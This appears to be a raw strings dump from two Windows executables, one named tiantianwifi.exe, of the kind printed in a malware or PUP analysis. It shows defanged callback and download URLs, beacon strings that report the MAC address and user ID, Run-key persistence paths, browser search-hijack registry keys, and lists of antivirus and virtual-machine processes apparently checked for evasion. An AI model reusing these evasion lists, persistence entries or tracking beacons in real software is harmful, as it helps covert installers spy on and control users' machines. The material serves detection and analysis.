.?AV?$AlgorithmImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyDerivationAlgorithm@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@VHMAC_Base@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@VHMAC_Base@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@VDL_GroupParameters_GFP_DefaultSafePrime@2@VOID@2@@CryptoPP@@
.?AV?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@VDL_GroupParameters_GFP_DefaultSafePrime@2@VOID@2@@CryptoPP@@
.?AV?$DL_PublicKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@VDL_GroupParameters_GFP@2@VOID@2@@CryptoPP@@
.?AV?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@VDL_GroupParameters_GFP@2@VOID@2@@CryptoPP@@
.?AV?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0A@$0HPPPPPPP@$00$03$0A@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.PAVDL_GroupParameters_IntegerBased@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AVKeyTooShort@PK_SignatureScheme@CryptoPP@@
.?AVInvalidKeyLength@PK_SignatureScheme@CryptoPP@@
.PBVPrimeSelector@CryptoPP@@
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
hXXp://xiaobingdou.com/anzhuang.aspx
hXXp://xiaobingdou.com/jihuo.aspx
Advapi32.dll
HKEY_DYN_DATA
QhXXp://VVV.tobeahero.cn
mailto:[email protected]
%d/%d/%d/%d/%d/%d
Rmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
USER32.DLL
portuguese-brazilian
[%d:%d:%d:%d(%d)]
combase.dll
badvapi32.dll
c.exe
d\
hXXp://1212.ip138.com/ic.asp
hXXp://VVV.ip-adress.com/
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php
?h=X-X-X-X-X-X&r=8888_%s --- sdadsada
?h=X-X-X-X-X-X&r=9999_%s --- sdadsada
?h=X-X-X-X-X-X&r=1000_%s --- sdadsada
?h=X-X-X-X-X-X&r=1234_%s --- sdadsada
?h=X-X-X-X-X-X&r=7777_%s --- sdadsada
?h=X-X-X-X-X-X&r=2345_%s --- sdadsada
?h=X-X-X-X-X-X&r=9527_%s --- sdadsada
?h=X-X-X-X-X-X&r=3456_%s --- sdadsada
?h=X-X-X-X-X-X&r=4567_%s --- sdadsada
?h=X-X-X-X-X-X&r=7890_%s --- sdadsada
?h=X-X-X-X-X-X&r=7892_%s --- sdadsada
?h=X-X-X-X-X-X&r=7893_%s --- sdadsada
?h=X-X-X-X-X-X&r=7894_%s --- sdadsada
?h=X-X-X-X-X-X&r=7891_%s --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s&a=%d&rt=%d --- adadsada
?h=X-X-X-X-X-X&r=%s_%s&a=%d --- adadsada
mac=X-X-X-X-X-X&app=%s&uid=%s&err=%s
YeapUserInfo.ini
swapfile.ini
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
cmd /C %s
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
AvastUI.exe
BavSvc.exe
rstray.exe
SSScheduler.exe
ccSvcHst.exe
KVwsc.exe
FilMsg.exe
secenter.exe
coreServiceShell.exe
Portuguese(Brazilian)
Portuguese(Standard)
GOOGLE CHROME
EXPLORER.EXE
hXXp://upgrade.eszju.cn/
setup.exe
hXXp://down.eszju.cn/
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
000000000000000
0000000
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KS1NL.tmp\AutoTime.exe
Windows
Windows
:hXXp://VVV.tobeahero.cn
:[email protected]
1, 0, 0, 1
AutoShut.EXE
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
Replace%Select the entire document

tiantianwifi.exe_2436:

.text
`.rdata
@.data
.rsrc
@.reloc
,index[%d],
(00356783465456)
XEle_IsShowEle
(%d),
(%d),name(%s)
API:%s()
,[%s]
=RegDeleteKeyExW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
MaxPolicyElementKey
pExecutionResource
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
d:\sdk\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
d:\sdk\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
src\DirectoryIteratorStrategy.cpp
Property not supported
%<>{}|\"^`
https
bad or invalid port number
src\TemporaryFile.cpp
src\BinaryWriter.cpp
src\DateTime.cpp
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\TextConverter.cpp
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
src\TextIterator.cpp
d:\sdk\poco-1.5.4\foundation\src\bignum.h
d:\sdk\poco-1.5.4\foundation\src\bignum-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\bignum.cc
d:\sdk\poco-1.5.4\foundation\src\fast-dtoa.cc
d:\sdk\poco-1.5.4\foundation\src\strtod.cc
d:\sdk\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
cannot create named event %s [Error %d: %s]
anonymous pipe
d:\sdk\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
HTTP/1.0
HTTP/1.1
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\HTTPSession.cpp
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\HostEntry.cpp
src\Socket.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
Not a valid registry key
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
WlanHostedNetworkSetSecondaryKey
WlanHostedNetworkQuerySecondaryKey
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
..\..\Src\Common\OperatingSystem.cpp
%s[%d]:%s
CoInitializeEx failed: %x
Failed to create an instance of ITaskService: %x
ITaskService::Connect failed: %x
ITaskService::GetFolder failed: %x
.d
%s[%d]
..\..\Src\Common\CommUtils.cpp
http\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes
FaviconURLFallback
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\%s
hXXp://VVV.sogou.com/favicon.ico
Chrome
Mozilla Firefox
Opera
Zihu.exe
QtWeb
SeaMonkey
Mozilla Firefox 29.0.0.0 Nightly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
user32.dll
HKEY_USERS\%s\Software\%s\appInstall\%s
HKEY_CURRENT_USER\Software\%s\appInstall\%s
HKEY_USERS\%s\Software\%s\appInstall\
HKEY_CURRENT_USER\Software\%s\appInstall\
ntdll.dll
kernel32.dll
Wtsapi32.dll
winlogon.exe
explorer.exe
Process token open Error: %u
Lookup Privilege value Error: %u
DuplicateTokenEx Error: %u
CreateProcessAsUser Error: %u
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
collect0.eszju.cn
mac=%s&app=%s&uid=%s&serno=%s&sid=%s
mac=%s&app=%s&uid=%s&serno=%s&mos=%s&mip=%s&sid=%s
mac=X-X-X-X-X-X&serno=%s&mos=%s&app=%s&uid=%s&sn=%s&fn=%s&fs=%ld&mifr=%s&sid=%s
..\..\Src\Common\Internet.cpp
F:\pz_git\vendor\inc\Poco/String.h
..\..\Src\Common\FileAssoc.cpp
open with %s
X:X:X:X:X:X
dnsapi.dll
X-X-X-X-X-X
%d.%d.%d.%d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
..\..\Src\Common\Adapter.cpp
F:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
F:\pz_git\bin\tiantianwifi.pdb
GetProcessHeap
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegEnumKeyW
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
ole32.dll
OLEAUT32.dll
gdiplus.dll
MSIMG32.dll
WS2_32.dll
IPHLPAPI.DLL
IMM32.dll
VERSION.dll
GetCPInfo
CreatePipe
RegQueryInfoKeyA
1.2.5
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVPipeImpl@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AVCXEventMsg@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
%Program Files%\ttwifi\tiantianwifi.exe
00000000000000000001
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
ID(%d),
(%d),XC_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON,ID(%d),bShow(%d)
(%d),XC_RADIO,ID(%d),bShow(%d)
(%d),XC_CHECK,ID(%d),bShow(%d)
(%d),XC_EDIT,ID(%d),bShow(%d)
(%d),XC_RICHEDIT,ID(%d),bShow(%d)
(%d),XC_COMBOBOX,ID(%d),bShow(%d)
(%d),XC_SCROLLBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW,ID(%d),bShow(%d)
(%d),XC_LIST,ID(%d),bShow(%d)
(%d),XC_LISTBOX,ID(%d),bShow(%d)
(%d),XC_TREE,ID(%d),bShow(%d)
(%d),XC_MENUBAR,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE,ID(%d),bShow(%d)
(%d),XC_SLIDERBAR,ID(%d),bShow(%d)
(%d),XC_PROGRESSBAR,ID(%d),bShow(%d)
(%d),XC_TOOLBAR,ID(%d),bShow(%d)
(%d),XC_STATIC,ID(%d),bShow(%d)
(%d),XC_GROUPBOX,ID(%d),bShow(%d)
(%d),XC_PICTURE,ID(%d),bShow(%d)
(%d),XC_MONTHCAL,ID(%d),bShow(%d)
(%d),XC_DATETIME,ID(%d),bShow(%d)
(%d),XC_PROPERTYGRID,ID(%d),bShow(%d)
(%d),XC_CHOOSECOLOR,ID(%d),bShow(%d)
(%d),XC_OUTLOOK,ID(%d),bShow(%d)
(%d),XC_TEXTLINK,ID(%d),bShow(%d)
(%d),XC_TABBAR,ID(%d),bShow(%d)
(%d),XC_GIF,ID(%d),bShow(%d)
(%d),XC_EDITFILE,ID(%d),bShow(%d)
(%d),XC_LISTVIEW,ID(%d),bShow(%d)
(%d),XC_PANE,ID(%d),bShow(%d)
(%d),XC_DRAGBAR,ID(%d),bShow(%d)
(%d),XC_SCROLLVIEW_VIEW,ID(%d),bShow(%d)
(%d),XC_CAPTION,ID(%d),bShow(%d)
(%d),XC_MENUBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_TOOLBAR_BUTTON,ID(%d),bShow(%d)
(%d),XC_PROPERTYPAGE_LABEL,ID(%d),bShow(%d)
(%d),XC_PIER,ID(%d),bShow(%d)
(%d),XC_BUTTON_MENU,ID(%d),bShow(%d)
(%d),XC_VIRTUAL_ELE,ID(%d),bShow(%d)
(%d),XC_BUTTON_MIN,ID(%d),bShow(%d)
(%d),XC_BUTTON_MAX,ID(%d),bShow(%d)
(%d),XC_BUTTON_CLOSE,ID(%d),bShow(%d)
(%d),XC_TREE_SUPER,ID(%d),bShow(%d)
left:%d , top:%d , right:%d , bottom:%d
title=%s
combase.dll
Fmscoree.dll
Fkernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
USER32.DLL
portuguese-brazilian
Iadvapi32.dll
Current version does not support XP
%s. Error code %x.
Failed to enable ICS. Error code %x.
" joined the hosted network
Hosted network key should contain 8 ~ 63 case-sensitive characters.
Hosted network name should contain 1 ~ 32 case-sensitive characters, and hosted network key contains 8 ~ 63 case-sensitive characters.
MSOFTWARE\Policies\Microsoft\Windows\Network Connections
bSystem\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
bnetshell.dll
NCM_SHAREDACCESSHOST_LAN
NCM_SHAREDACCESSHOST_RAS
bWlanapi.dll
VBoxTray.exe
VBoxService.exe
VMwareUser.exe
VMwareTray.exe
VMUpgradeHelper.exe
vmtoolsd.exe
vmacthlp.exe
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
AvastUI.exe
BavSvc.exe
QQPCRTP.exe
QQPCTray.exe
KMService.exe
kxescore.exe
kxetray.exe
ksafe.exe
KSafeSvc.exe
KSafeTray.exe
KAVStart.exe
KWatch.exe
KMailMon.exe
VPTray.exe
Portuguese(Brazilian)
Portuguese(Standard)
:yqsclient.exe
barrms.exe
puwin.exe
TLnbLdr.exe
Pubwin.exe
rwyNCMc.exe
BarClientView.exe
hintclinet.exe
eyoorun.exe
clsmn.exe
PubwinClient.exe
mpclient.exe
fzclient.exe
wxsyncli.exe
recreation.exe
d\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
nHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
tmpData.ini
etmpData.ini
swapfile.ini
sEXPLORER.EXE
hXXp://upgrade.eszju.cn/
setup.exe
%s %s
hXXp://down.eszju.cn/
hXXp://down.eszju.cn/%s
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
procexp.exe
QQ.exe
taskmgr.exe
"%s" %s
hXXp://1111.ip138.com/ic.asp
hXXp://ip.chinaz.com/?IP=
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php
mac=X-X-X-X-X-X&app=%s&uid=%s&err=%s&sid=%s
